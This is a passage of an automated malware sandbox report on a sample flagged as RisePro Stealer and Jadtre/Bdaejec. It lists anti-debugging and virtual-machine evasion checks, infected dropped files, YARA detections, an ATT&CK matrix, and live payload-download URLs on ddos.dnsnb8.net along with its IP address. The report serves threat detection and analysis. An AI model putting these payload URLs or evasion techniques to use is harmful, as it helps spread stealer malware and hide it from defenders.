Source: MPGPH131.exe, 0000000F.00000002.3734078403.00000000009FD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\|
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WARE\ACPI\DSDT\VBOX__G
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: MPGPH131.exe, 0000000E.00000003.1382508816.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}X
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001B00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000E70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Fc
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`-
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&>
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001B00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&<
Source: hunta[1].exe, 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

API call chain: ExitProcess graph end node

graph_4-1022

Source: C:\Users\user\Desktop\hunta[1].exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\hunta[1].exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\hunta[1].exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_059B0CB7 Start: 059B0C8C End: 059B0C88	2_2_059B0CB7
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_059B07B1 Start: 059B0A7B End: 059B077B	2_2_059B07B1
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_04E200D8 Start: 04E201A2 End: 04E200AA	24_2_04E200D8

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\hunta[1].exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\hunta[1].exe

Code function: 2_2_059B056A rdtsc

2_2_059B056A

Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_01431044 mov eax, dword ptr fs:[00000030h]	2_2_01431044
Source: C:\Users\user\Desktop\hunta[1].exe	Code function: 2_2_00E94AB0 mov eax, dword ptr fs:[00000030h]	2_2_00E94AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_008B1044 mov eax, dword ptr fs:[00000030h]	14_2_008B1044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 14_2_00314AB0 mov eax, dword ptr fs:[00000030h]	14_2_00314AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_008B1044 mov eax, dword ptr fs:[00000030h]	15_2_008B1044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 15_2_00314AB0 mov eax, dword ptr fs:[00000030h]	15_2_00314AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_00821044 mov eax, dword ptr fs:[00000030h]	21_2_00821044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 21_2_00284AB0 mov eax, dword ptr fs:[00000030h]	21_2_00284AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_00821044 mov eax, dword ptr fs:[00000030h]	24_2_00821044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 24_2_00284AB0 mov eax, dword ptr fs:[00000030h]	24_2_00284AB0

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "

Jump to behavior

Source: hunta[1].exe, hunta[1].exe, 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: SciTE.exe.4.dr	Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\hunta[1].exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\hunta[1].exe

Code function: 2_2_00F5C92A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

2_2_00F5C92A

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Code function: 4_2_0021139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

4_2_0021139F

Source: C:\Users\user\Desktop\hunta[1].exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: WwKLWFk.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WwKLWFk.exe PID: 1836, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hunta[1].exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 8124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 5640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 4228, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: WwKLWFk.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WwKLWFk.exe PID: 1836, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hunta[1].exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 8124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 5640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 4228, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Native API	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	3 Obfuscated Files or Information	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	12 Process Injection	13 Software Packing	Security Account Manager	215 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Masquerading	LSA Secrets	751 Security Software Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	24 Virtualization/Sandbox Evasion	Cached Domain Credentials	24 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
hunta[1].exe	95%	ReversingLabs	Win32.Virus.Jadtre
hunta[1].exe	100%	Avira	W32/Jadtre.B
hunta[1].exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\ProgramData\MPGPH131\MPGPH131.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	100%	Joe Sandbox ML
C:\ProgramData\MPGPH131\MPGPH131.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	100%	Joe Sandbox ML
C:\ProgramData\MPGPH131\MPGPH131.exe	95%	ReversingLabs	Win32.Virus.Jadtre
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	95%	ReversingLabs	Win32.Virus.Jadtre
C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	92%	ReversingLabs	Win32.Trojan.Madeba

Source	Detection	Scanner	Label
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	URL Reputation	malware
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
https://t.me/RiseProSUPPORTv	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rars	100%	Avira URL Cloud	phishing
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rarA	100%	Avira URL Cloud	phishing
http://www.develop.com	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net/	100%	URL Reputation	malware
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarppData	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.winimage.com/zLibDll	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
https://t.me/RiseProSUPPORT%	0%	Avira URL Cloud	safe
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:	100%	Avira URL Cloud	phishing
https://t.me/RiseProSUPPORT	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarl	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rar1	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarV	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k5.rar	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net/O	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rar8	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net/d	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k3.rar5	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k5.rarC:	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k4.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarc	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarfC:	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k5.rar	false	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k4.rar	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rarA	WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A10000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://t.me/RiseProSUPPORTv	hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rars	WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://www.rftp.comJosiah	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarppData	WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.activestate.com	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	WwKLWFk.exe, 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmp, WwKLWFk.exe, 00000004.00000003.1268128954.0000000000DF0000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1466940967.0000000000980000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/RiseProSUPPORT%	RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.4.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
https://t.me/RiseProSUPPORT	hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.000000000105D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000002.3734938152.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:	WwKLWFk.exe, 00000004.00000002.1418971368.0000000001210000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.baanboard.comBrendon	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar1	WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.smartsharesystems.com/	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarl	WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.scintilla.org	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar8	WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.develop.com	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
